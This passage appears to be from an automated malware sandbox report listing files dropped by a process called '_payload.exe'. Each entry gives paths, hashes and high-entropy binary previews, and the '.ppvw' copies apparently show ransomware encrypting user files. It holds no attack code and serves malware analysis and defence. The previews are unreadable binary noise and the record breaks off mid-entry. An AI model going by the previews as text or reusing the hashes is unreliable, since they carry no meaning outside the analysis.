                                                                                                                          Preview:KATAXA...V..@.!..(;...-..n......~UJ...O.^............}.Sc^.-.Y.7.0A..k..-......Dx."....,+.....Z..-4.8.Z....kc..R..{........f.O....;`...>6....kX{.x%.._I.2...-..'..6....M#`.|...J...|.'.....RJ,......N........JoUH}7..g.q..".b..-&c....u..t.+.)'#..rv.T........_E.O4.gt..It.p..C%]|..X./n..P.S......`S..-.65.'.3...&..)......W96.E.lt|mK"JE..-x..m..Lt.K..0<.).H.)e8../..O../...........>%.+..b."....H...Qq.h5.....S.W....4...`..[..,.).ynW.~<.nD....m.E...e../..2.K...A!..D.5.`....>...RrE.N,X...=).1.f.$Y.5..#7....T2...lO.4..Q...b...v."aOL......aO.......*..#.b.]v...;l.>.m{'..!..........>.l"..ne......`..`.8.C...m.O....lDB.4h8(.p..M....d...V34.Q9.*.p&....T.......j|...9.Z...i...%Q....#....$.C....%D.N.......K..t.V.X...Z....~l8...,Z..E.].Q^.,n.Ka.:&!24.du.....S.......s."...^G......c..).;..T(.ox...d.yU3../t0s...f.w@d.[..........a~.\....XV.t.......#b._.y..S.M.BlB.KL=......z.z.[...4.A ...a....;m|{.W%..C.............5....(_......W.....P.X.....]..

                                                                                                                          C:\Users\user\Desktop\XZXHAVGRAG\KATAXZVCPS.png.ppvw (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.86000113476167
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:2y56WY2c1WruK/+qutvpmQRhR7t6FR870+DPPAdO8IRyETEsjeKR3if21OwbD:2ysf2BruFNZpmE35i28exf3HD
                                                                                                                          MD5:FD0E61AC3F843B3F2600C06E4AF74B7C
                                                                                                                          SHA1:3EEC150B794C4D7F26A17A53318C6205C79E5B48
                                                                                                                          SHA-256:6E88A3940592CD176C99EA8728AB3E045A9C9BFFF3CF32BD4CEEE633A5BF7486
                                                                                                                          SHA-512:F1EF65BB9EA74F4C2DEB7AF3727ECE2C251075D081F5DFD094F04518D8C2F84B6276673702EF4A7664FAE587E1006AA49F8D5FB486BA4B633647A9EB24BE4074
                                                                                                                          Malicious:false
                                                                                                                          Preview:KATAXA...V..@.!..(;...-..n......~UJ...O.^............}.Sc^.-.Y.7.0A..k..-......Dx."....,+.....Z..-4.8.Z....kc..R..{........f.O....;`...>6....kX{.x%.._I.2...-..'..6....M#`.|...J...|.'.....RJ,......N........JoUH}7..g.q..".b..-&c....u..t.+.)'#..rv.T........_E.O4.gt..It.p..C%]|..X./n..P.S......`S..-.65.'.3...&..)......W96.E.lt|mK"JE..-x..m..Lt.K..0<.).H.)e8../..O../...........>%.+..b."....H...Qq.h5.....S.W....4...`..[..,.).ynW.~<.nD....m.E...e../..2.K...A!..D.5.`....>...RrE.N,X...=).1.f.$Y.5..#7....T2...lO.4..Q...b...v."aOL......aO.......*..#.b.]v...;l.>.m{'..!..........>.l"..ne......`..`.8.C...m.O....lDB.4h8(.p..M....d...V34.Q9.*.p&....T.......j|...9.Z...i...%Q....#....$.C....%D.N.......K..t.V.X...Z....~l8...,Z..E.].Q^.,n.Ka.:&!24.du.....S.......s."...^G......c..).;..T(.ox...d.yU3../t0s...f.w@d.[..........a~.\....XV.t.......#b._.y..S.M.BlB.KL=......z.z.[...4.A ...a....;m|{.W%..C.............5....(_......W.....P.X.....]..

                                                                                                                          C:\Users\user\Desktop\XZXHAVGRAG\UMMBDNEQBN.jpg

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.845361238378766
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:NWlNJZD59AZZ4uHr6iBTDxHt6W5gDmXQK3S9qTDirRNjRYhkGvbD:AlDBQDPixmXP3oRsVzD
                                                                                                                          MD5:0BE936E0DE618CB9B875BE67C7700981
                                                                                                                          SHA1:48C82EC382FEF37FDE7D93DAE5C285A88CDD1DFC
                                                                                                                          SHA-256:0B4A3892E15E783AF8BB828E91719F2E952994CC59037632F11C0F6CDDBDDE04
                                                                                                                          SHA-512:F9753BA887A1EE6CC3C012F2932A10101F6C94A0BDA72DC93AE45AE9BAFB87C78E53B60D1D3161D9953EE7982F4B4737B954EC20E73F493DE91F1EA7DA0C846E
                                                                                                                          Malicious:false
                                                                                                                          Preview:UMMBD..'....L............6*k..OZ?......Q..Bz..etm;.x.s.~.b.|6....~I.fiY...(.H.b.%.,...a......N.'...ynC.....7.J....c'...<x...f.......%.%5.$".:M..!...,AE..,.PG.d.SZT.r.p#..34...t.?.e..0...K..Za.../.C.*.....j.b.`.n...?.z.....Ud!.@...WJ.(....o....'.jK%..P.L..2|........s..M<l.~..S.t....Ns0...oQ_"&..In..uY..8k..:`=...e}......Q...(x."...-.W.......{.*b-..cl..;...6..\Cr"HmQ/L.v..b}..]. .]5._`...[....|7.Y5.)..8..v2.A.I..8..9C..m$Y.]d.4.......\A.]..$.E...[.AF...{.Z.T.......#5"..a.W>.Q......+.k.j.V.m...kf.&..W..h:...j.*h..d.."X.N.t......aXu..G]..].#..8...9a..s......N.n...(Z......)........`.A8.a.....]...5<'.G.._...p.&..bs@...|W.%.c.].'.3H..|._j..{..7.a..B.n..c{.o{....A...$..n....2..Wk2...kv_.X.....S01.kcR.=.S..AF.g$..R.1..~.\......R.."p5.8.z.D.A4...{%..n.N../.......o..n&.3...Do.*..k...qDd..<....rK....b..I.Y...........=...S.'${...|...=T.;...P...,....aX...u ..7'...5^...S...(.[h.)....a.&\.X.0........]..<g.MW_A......B....u..Y%~a..J*.a..K..b6.....].m

                                                                                                                          C:\Users\user\Desktop\XZXHAVGRAG\UMMBDNEQBN.jpg.ppvw (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.845361238378766
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:NWlNJZD59AZZ4uHr6iBTDxHt6W5gDmXQK3S9qTDirRNjRYhkGvbD:AlDBQDPixmXP3oRsVzD
                                                                                                                          MD5:0BE936E0DE618CB9B875BE67C7700981
                                                                                                                          SHA1:48C82EC382FEF37FDE7D93DAE5C285A88CDD1DFC
                                                                                                                          SHA-256:0B4A3892E15E783AF8BB828E91719F2E952994CC59037632F11C0F6CDDBDDE04
                                                                                                                          SHA-512:F9753BA887A1EE6CC3C012F2932A10101F6C94A0BDA72DC93AE45AE9BAFB87C78E53B60D1D3161D9953EE7982F4B4737B954EC20E73F493DE91F1EA7DA0C846E
                                                                                                                          Malicious:false
                                                                                                                          Preview:UMMBD..'....L............6*k..OZ?......Q..Bz..etm;.x.s.~.b.|6....~I.fiY...(.H.b.%.,...a......N.'...ynC.....7.J....c'...<x...f.......%.%5.$".:M..!...,AE..,.PG.d.SZT.r.p#..34...t.?.e..0...K..Za.../.C.*.....j.b.`.n...?.z.....Ud!.@...WJ.(....o....'.jK%..P.L..2|........s..M<l.~..S.t....Ns0...oQ_"&..In..uY..8k..:`=...e}......Q...(x."...-.W.......{.*b-..cl..;...6..\Cr"HmQ/L.v..b}..]. .]5._`...[....|7.Y5.)..8..v2.A.I..8..9C..m$Y.]d.4.......\A.]..$.E...[.AF...{.Z.T.......#5"..a.W>.Q......+.k.j.V.m...kf.&..W..h:...j.*h..d.."X.N.t......aXu..G]..].#..8...9a..s......N.n...(Z......)........`.A8.a.....]...5<'.G.._...p.&..bs@...|W.%.c.].'.3H..|._j..{..7.a..B.n..c{.o{....A...$..n....2..Wk2...kv_.X.....S01.kcR.=.S..AF.g$..R.1..~.\......R.."p5.8.z.D.A4...{%..n.N../.......o..n&.3...Do.*..k...qDd..<....rK....b..I.Y...........=...S.'${...|...=T.;...P...,....aX...u ..7'...5^...S...(.[h.)....a.&\.X.0........]..<g.MW_A......B....u..Y%~a..J*.a..K..b6.....].m

                                                                                                                          C:\Users\user\Documents\BPMLNOBVSB.jpg

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.851320055708777
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:vk4TIkc/htHPYRQZUTFy0eVf1Hpt49CsM+so2O4NvGZATa37fBVEciadcvbD:3TgZtH+UUTFyRVfBpt49CsraOevoN372
                                                                                                                          MD5:82D3C09E6800017114E43B765EDA0A60
                                                                                                                          SHA1:AA67184093BCF695A9B9A8D12145569A6FDDF8A3
                                                                                                                          SHA-256:A2347E88EBE33157BDD86D748853AA9D9C81ADE40BFC496A2978A14FC0326138
                                                                                                                          SHA-512:24D82CBFDE9285C1050B5547182FD5E01151B9B6F5A45B7782376C1E042CB80FCBDC37F426A5BD62B64E9C864745DDD55A3E02016B9D5AD2586B84AD5369BE8A
                                                                                                                          Malicious:false
                                                                                                                          Preview:BPMLN..vEx@u.F .4...r?.^P.&..:.g.D...#Q.....KH..[Y...$+ ../^.6....9so....+s.o..,!oNe.......x.@..{#.;.c.-..C..]....CUY...........9F....T\...l.96..b...@.:t.m.g~..v...,.f.r...E....-....S.4.U...}.......0.....o..jmh...{....p.J!.FY...<.'.vA./....K..^n+j..t....+.#.&..u.-wC....1-{..\v%....p..C./7*.....Z.O...#e.d|EePWs.......%.q..0U....5.nj...._.B..W..6..._.O..>.....{V..5."J...;y..=k.C..PcV\. ....9.F.D.J..1>..y).....|.MF.....%....$O.#d....ao$.`...+~.....j..t.....<.......l.kF...........C.......s..=.....B.....(y~. Q.......l..-.j.U.44(..........x.r.P...YMO.b..@.....1.K.....O.../.0.8...?.#b."....o7q.....7...G....O)."....`u..t.X.X.l0(...j.......<Q....^/-...v.AW@I?.\....21....G.....m......|......Pd..O..O.;..H..<...#..4..y.../w.Fz..z}xd.....s}..iB..eD=....1.^.&.$(..;..#..T4g.Bw.-VM..............}.S..U..K.b..i&.r.q..O!r..w.$.,..wC.s..4i..c..3;...cu8$..8.....3....m.........N40.>.....N.Z.R..R.XK...[N..w.X.;......<.f^q..=..q...S....r..@.).U...0)".#.).b!..W..#~.

                                                                                                                          C:\Users\user\Documents\BPMLNOBVSB.jpg.ppvw (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.851320055708777
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:vk4TIkc/htHPYRQZUTFy0eVf1Hpt49CsM+so2O4NvGZATa37fBVEciadcvbD:3TgZtH+UUTFyRVfBpt49CsraOevoN372
                                                                                                                          MD5:82D3C09E6800017114E43B765EDA0A60
                                                                                                                          SHA1:AA67184093BCF695A9B9A8D12145569A6FDDF8A3
                                                                                                                          SHA-256:A2347E88EBE33157BDD86D748853AA9D9C81ADE40BFC496A2978A14FC0326138
                                                                                                                          SHA-512:24D82CBFDE9285C1050B5547182FD5E01151B9B6F5A45B7782376C1E042CB80FCBDC37F426A5BD62B64E9C864745DDD55A3E02016B9D5AD2586B84AD5369BE8A
                                                                                                                          Malicious:false
                                                                                                                          Preview:BPMLN..vEx@u.F .4...r?.^P.&..:.g.D...#Q.....KH..[Y...$+ ../^.6....9so....+s.o..,!oNe.......x.@..{#.;.c.-..C..]....CUY...........9F....T\...l.96..b...@.:t.m.g~..v...,.f.r...E....-....S.4.U...}.......0.....o..jmh...{....p.J!.FY...<.'.vA./....K..^n+j..t....+.#.&..u.-wC....1-{..\v%....p..C./7*.....Z.O...#e.d|EePWs.......%.q..0U....5.nj...._.B..W..6..._.O..>.....{V..5."J...;y..=k.C..PcV\. ....9.F.D.J..1>..y).....|.MF.....%....$O.#d....ao$.`...+~.....j..t.....<.......l.kF...........C.......s..=.....B.....(y~. Q.......l..-.j.U.44(..........x.r.P...YMO.b..@.....1.K.....O.../.0.8...?.#b."....o7q.....7...G....O)."....`u..t.X.X.l0(...j.......<Q....^/-...v.AW@I?.\....21....G.....m......|......Pd..O..O.;..H..<...#..4..y.../w.Fz..z}xd.....s}..iB..eD=....1.^.&.$(..;..#..T4g.Bw.-VM..............}.S..U..K.b..i&.r.q..O!r..w.$.,..wC.s..4i..c..3;...cu8$..8.....3....m.........N40.>.....N.Z.R..R.XK...[N..w.X.;......<.f^q..=..q...S....r..@.).U...0)".#.).b!..W..#~.

                                                                                                                          C:\Users\user\Documents\HTAGVDFUIE.mp3

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.86123370373769
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:EutzWTFK+/DuuNV0L/gDYa0+bwewgBKsixmiihmNEOWNOkAKyMmTB9qveBbD:EuFWpBDuuW8D4jYKdolhmNVW0a8F9qmZ
                                                                                                                          MD5:326B795915341C9CD1B510951E6A11DE
                                                                                                                          SHA1:39FB3FF9CC655BEC7D589A4E01A4DEFF3955A3DE
                                                                                                                          SHA-256:87BE1B39D0BE1F80441EC8CCD29ED0393F217D305A8A74718E79B04C926E53C1
                                                                                                                          SHA-512:99FDD0E6F59ED06F54AD96C2A39DE1E6BB94BEC9136FFC9C89EF0E7726AAC48E18171DDBB5CC954645D6109636AED1B45E7C19193064079E3921207C35D1DB61
                                                                                                                          Malicious:false
                                                                                                                          Preview:HTAGV......c..(3...S.o.......*..c.dp...Ii;.1...>./.......~.....Kv@.#.....U...5i..V......O....wh.6..-S......2...dj.......:.1..hF.P....#V...R0......?."..!......BgR.Sf.s....6....f.......0...._.J.x.384nI..a....P..T.O,!..8..._...i..X.n....~..>.:....B#.sb..~vKR.X[>SO..._.U+.....-{|.....x..T...WRO.V~L...Vd._{..;..N"..=.7b........!.....(Z....9..2A.5}.1.s. ..b...i..Mg.....(k<.5f1.3.......g}.....E.D=..F'"..|..!P...uj...+...{.b...{5.M.C~.../. .]..r.g.=.W......y/....H@[.Fdj...M.'.B..E.S.So.W.H%...lQ..y..4,.-.o1..b=.....'.|...t.E-.$D...i. -4...{....=.4KIo.....`..t..l2.X...]v...B..@.Q8.X..<c...VY.o......95./..|..,.]7:....zhiY$Z.X....Xq.xM.w0X4|..6..`iF}...]. .V......C@......m..1S.....-...qkW...A.#.z.(..v..J-..!.(..x....xA$.B....O/.c..D}c$............[\*.+u....l...J....,....E..X3N.P.TTK.TC.c1d...#r2.M.{\...;...tw.[t.v.. .*.Wp.1..H.T..[...W.0.}....^..$u........AG.c....y=......Q.....p.)....uD./D...U....Q.........n"kd.?D... .......9[R)a...N....@..O.}

                                                                                                                          C:\Users\user\Documents\HTAGVDFUIE.mp3.ppvw (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.86123370373769
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:EutzWTFK+/DuuNV0L/gDYa0+bwewgBKsixmiihmNEOWNOkAKyMmTB9qveBbD:EuFWpBDuuW8D4jYKdolhmNVW0a8F9qmZ
                                                                                                                          MD5:326B795915341C9CD1B510951E6A11DE
                                                                                                                          SHA1:39FB3FF9CC655BEC7D589A4E01A4DEFF3955A3DE
                                                                                                                          SHA-256:87BE1B39D0BE1F80441EC8CCD29ED0393F217D305A8A74718E79B04C926E53C1
                                                                                                                          SHA-512:99FDD0E6F59ED06F54AD96C2A39DE1E6BB94BEC9136FFC9C89EF0E7726AAC48E18171DDBB5CC954645D6109636AED1B45E7C19193064079E3921207C35D1DB61
                                                                                                                          Malicious:false
                                                                                                                          Preview:HTAGV......c..(3...S.o.......*..c.dp...Ii;.1...>./.......~.....Kv@.#.....U...5i..V......O....wh.6..-S......2...dj.......:.1..hF.P....#V...R0......?."..!......BgR.Sf.s....6....f.......0...._.J.x.384nI..a....P..T.O,!..8..._...i..X.n....~..>.:....B#.sb..~vKR.X[>SO..._.U+.....-{|.....x..T...WRO.V~L...Vd._{..;..N"..=.7b........!.....(Z....9..2A.5}.1.s. ..b...i..Mg.....(k<.5f1.3.......g}.....E.D=..F'"..|..!P...uj...+...{.b...{5.M.C~.../. .]..r.g.=.W......y/....H@[.Fdj...M.'.B..E.S.So.W.H%...lQ..y..4,.-.o1..b=.....'.|...t.E-.$D...i. -4...{....=.4KIo.....`..t..l2.X...]v...B..@.Q8.X..<c...VY.o......95./..|..,.]7:....zhiY$Z.X....Xq.xM.w0X4|..6..`iF}...]. .V......C@......m..1S.....-...qkW...A.#.z.(..v..J-..!.(..x....xA$.B....O/.c..D}c$............[\*.+u....l...J....,....E..X3N.P.TTK.TC.c1d...#r2.M.{\...;...tw.[t.v.. .*.Wp.1..H.T..[...W.0.}....^..$u........AG.c....y=......Q.....p.)....uD./D...U....Q.........n"kd.?D... .......9[R)a...N....@..O.}

                                                                                                                          C:\Users\user\Documents\HTAGVDFUIE.xlsx

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.8328563255146975
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:9WwrkKAxWRHq6VEj0OA8OmRljms6Xu54JVtiXo7vFPuUbo0mbD:9HIgRHq6VHv8OajD6X+q3i47vdumo00D
                                                                                                                          MD5:BD2C99105A487B8C8BD3698618309FF0
                                                                                                                          SHA1:2D38446AC3FEAF9B200A3653A9DE3123B8DB992A
                                                                                                                          SHA-256:62F4F277F84C50DEBED4D053CA9CD292DB11BB8DAEF8F5A3A7B164AE9F471532
                                                                                                                          SHA-512:C83F7E7BCD8BA8A1B74C9741B574F923AF644C2631197F07675FE565FD7C7A6B2BB1B55CFFBC33A250F2F32B1C670FAA7D8D23709A7C3B2B5F18180577DE3989
                                                                                                                          Malicious:false
                                                                                                                          Preview:HTAGV.%....9&V1.M..7..!...[t..U.....+....H....9.......gs.YJ.p.../g....r..f.6.._<o.C=..(...i...Q.......Z...v^.zC7.d....[.....J3E..3gx}......C*.{B.].m...[.I.....KZt..N3..c..=._..;..2.+.tZm.....l._.FPE....\..|..F.K... .%Q....R.*k..'.*...TN.Kq]5..= .l...3....ROu...=......1.?..*>.....]#....Br_..a...;..RM.%d..V.^....T]..F...n..5...Ed.*.6b.....f..o.x...I#`W.-...U..p...r1....'....V...'...]...2 G...(.....Zo.bht.L.H.F....>mq.>e8..R.5.<..6.O.'..zc~..g.a..^z)$....Z.d...V...3./.f}...w..V...`......Qy..J.e..7..5.+ ..z....b).....`...,.J....c....0G+....@5..2....@1Z.A...qUUqY...z\.7...Z...%1N.......B.w.r.~6....V.f?4.5.g-.....?D..C.=........D.W.p.C6..8.RgC.....G[.........jg.;..\+#m..-;'..`;...//a.D...j..S...A.C. ...vI.DVi.......D.......|.}..8.ac...=.m.Q..8a..?......j.4VF9....{..W!4p%e.:.XX..p.>.t...ss7`......n..t. ...'....^r..+...=...T.z.?.~..Y...M.....$;.3.]gLj.c...2..}.8Q...K.....^.b.......Xw........j..#...HQ......p$.....1..0..@"..O.....

                                                                                                                          C:\Users\user\Documents\HTAGVDFUIE.xlsx.ppvw (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.8328563255146975
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:9WwrkKAxWRHq6VEj0OA8OmRljms6Xu54JVtiXo7vFPuUbo0mbD:9HIgRHq6VHv8OajD6X+q3i47vdumo00D
                                                                                                                          MD5:BD2C99105A487B8C8BD3698618309FF0
                                                                                                                          SHA1:2D38446AC3FEAF9B200A3653A9DE3123B8DB992A
                                                                                                                          SHA-256:62F4F277F84C50DEBED4D053CA9CD292DB11BB8DAEF8F5A3A7B164AE9F471532
                                                                                                                          SHA-512:C83F7E7BCD8BA8A1B74C9741B574F923AF644C2631197F07675FE565FD7C7A6B2BB1B55CFFBC33A250F2F32B1C670FAA7D8D23709A7C3B2B5F18180577DE3989
                                                                                                                          Malicious:false
                                                                                                                          Preview:HTAGV.%....9&V1.M..7..!...[t..U.....+....H....9.......gs.YJ.p.../g....r..f.6.._<o.C=..(...i...Q.......Z...v^.zC7.d....[.....J3E..3gx}......C*.{B.].m...[.I.....KZt..N3..c..=._..;..2.+.tZm.....l._.FPE....\..|..F.K... .%Q....R.*k..'.*...TN.Kq]5..= .l...3....ROu...=......1.?..*>.....]#....Br_..a...;..RM.%d..V.^....T]..F...n..5...Ed.*.6b.....f..o.x...I#`W.-...U..p...r1....'....V...'...]...2 G...(.....Zo.bht.L.H.F....>mq.>e8..R.5.<..6.O.'..zc~..g.a..^z)$....Z.d...V...3./.f}...w..V...`......Qy..J.e..7..5.+ ..z....b).....`...,.J....c....0G+....@5..2....@1Z.A...qUUqY...z\.7...Z...%1N.......B.w.r.~6....V.f?4.5.g-.....?D..C.=........D.W.p.C6..8.RgC.....G[.........jg.;..\+#m..-;'..`;...//a.D...j..S...A.C. ...vI.DVi.......D.......|.}..8.ac...=.m.Q..8a..?......j.4VF9....{..W!4p%e.:.XX..p.>.t...ss7`......n..t. ...'....^r..+...=...T.z.?.~..Y...M.....$;.3.]gLj.c...2..}.8Q...K.....^.b.......Xw........j..#...HQ......p$.....1..0..@"..O.....

                                                                                                                          C:\Users\user\Documents\KZWFNRXYKI.jpg

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.858180577827498
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:ToB8Bc/glVNa9YrdqLZBWfjb3QBOl2iLxV1KZpFsNnZ6vmSUloabD:To6Bc/glVNa94dqLZBEiK1PKZcZOUloE
                                                                                                                          MD5:78D418FB3E2BFE8167B5FC4D7DE6662B
                                                                                                                          SHA1:DF3BB4008C9100B92BB127ADEAC76F0647727D2E
                                                                                                                          SHA-256:BF4736D7B417775DC2DB96DB6ECDC38DEF92B6678AD264C117A5CD76C869A956
                                                                                                                          SHA-512:D18C9FEC463E1BF3464327BE13CBE0B945B649EA045C6B5972DA285DE755CDD67CFB8634CAF3AD186517B0D95D88E3803F5334E420E76545B893FA95881D3891
                                                                                                                          Malicious:false
                                                                                                                          Preview:KZWFNP/.>..c....`...V...5.`.....5..vb...-..n..+.._.......[.N..9......s.nu......r.....^.W..c.o:........#;K.pv\."..J3..kG...$.Dbz.-.......Y..29...^.0%.....7.....1.6.A..Z..i.#...|...0...<..&/K2.....z.8ip......'.3...Z..=.....oDn6...|..u.l..-.3.BO...."K.Xfz...&.J..E.E.@..p..D..kn.~......).....c...;.&.s.H.{.t.F>......Jk.Y.......I,.c...DA.....q...#..7A.C.%#l.Y.>.~wv|8s.+..M..w..^&#.,8...sC#b......enj"..d.].%.."'..y....g.$.!J.X......B..U..>^H......Xu..._.V.......1.I...+.*...Ud.N..)....m...]r...?..'Z~.sd.7sh!...6..U..D.a....l...|).{..w..]....Z.....h.......e.Q...xQ.s..5f.,.....T.:.....U.8I. .j}..$rL......=...............MT)..%.09..;..5$...&...5 .+K....2.tg...[..QF .....>.H...p.0....<.YZ..g.../rJ}.].....'...5.........e.v..L.9.#...j\.}.,.!l...41.j./......4...#..@...`DY..=.~9.../k...}D..@....!.`^q........Q(lj.......eH-...zP...2...x.1..!.,.%...........%...?..c,.0....a....=p....x.@=.`..}..j.A.%...1..S...RMr.[._k.&zT..<...0.t<....|Vz~..

                                                                                                                          C:\Users\user\Documents\KZWFNRXYKI.jpg.ppvw (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.858180577827498
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:ToB8Bc/glVNa9YrdqLZBWfjb3QBOl2iLxV1KZpFsNnZ6vmSUloabD:To6Bc/glVNa94dqLZBEiK1PKZcZOUloE
                                                                                                                          MD5:78D418FB3E2BFE8167B5FC4D7DE6662B
                                                                                                                          SHA1:DF3BB4008C9100B92BB127ADEAC76F0647727D2E
                                                                                                                          SHA-256:BF4736D7B417775DC2DB96DB6ECDC38DEF92B6678AD264C117A5CD76C869A956
                                                                                                                          SHA-512:D18C9FEC463E1BF3464327BE13CBE0B945B649EA045C6B5972DA285DE755CDD67CFB8634CAF3AD186517B0D95D88E3803F5334E420E76545B893FA95881D3891
                                                                                                                          Malicious:false
                                                                                                                          Preview:KZWFNP/.>..c....`...V...5.`.....5..vb...-..n..+.._.......[.N..9......s.nu......r.....^.W..c.o:........#;K.pv\."..J3..kG...$.Dbz.-.......Y..29...^.0%.....7.....1.6.A..Z..i.#...|...0...<..&/K2.....z.8ip......'.3...Z..=.....oDn6...|..u.l..-.3.BO...."K.Xfz...&.J..E.E.@..p..D..kn.~......).....c...;.&.s.H.{.t.F>......Jk.Y.......I,.c...DA.....q...#..7A.C.%#l.Y.>.~wv|8s.+..M..w..^&#.,8...sC#b......enj"..d.].%.."'..y....g.$.!J.X......B..U..>^H......Xu..._.V.......1.I...+.*...Ud.N..)....m...]r...?..'Z~.sd.7sh!...6..U..D.a....l...|).{..w..]....Z.....h.......e.Q...xQ.s..5f.,.....T.:.....U.8I. .j}..$rL......=...............MT)..%.09..;..5$...&...5 .+K....2.tg...[..QF .....>.H...p.0....<.YZ..g.../rJ}.].....'...5.........e.v..L.9.#...j\.}.,.!l...41.j./......4...#..@...`DY..=.~9.../k...}D..@....!.`^q........Q(lj.......eH-...zP...2...x.1..!.,.%...........%...?..c,.0....a....=p....x.@=.`..}..j.A.%...1..S...RMr.[._k.&zT..<...0.t<....|Vz~..

                                                                                                                          C:\Users\user\Documents\LTKMYBSEYZ.jpg

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.856799558420025
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:IoN4quK1EQ5cYkYHx/McE4UmnbNRQY7J/MBK1wnYborE97K3bnVfbD:1N4M1lB2cE4/F7Jb1wnYmiWbnVDD
                                                                                                                          MD5:685243030B73EBF6267EF5AE637BF108
                                                                                                                          SHA1:853B6E06B7F749D5426CD358233E0BF5918B5655
                                                                                                                          SHA-256:2D8FAA62241A9DA34BBADA6DB5D89EFB18FB9334EBE806166E171A4C56A3BE2E
                                                                                                                          SHA-512:53F7D96F844FC154E03F5066A03B8E75B7E99742C7A3500E436EA90534ED40E357AAA6A19E76288964501FC81FAABE8871E4C5DE64D002465E402A575030599F
                                                                                                                          Malicious:false
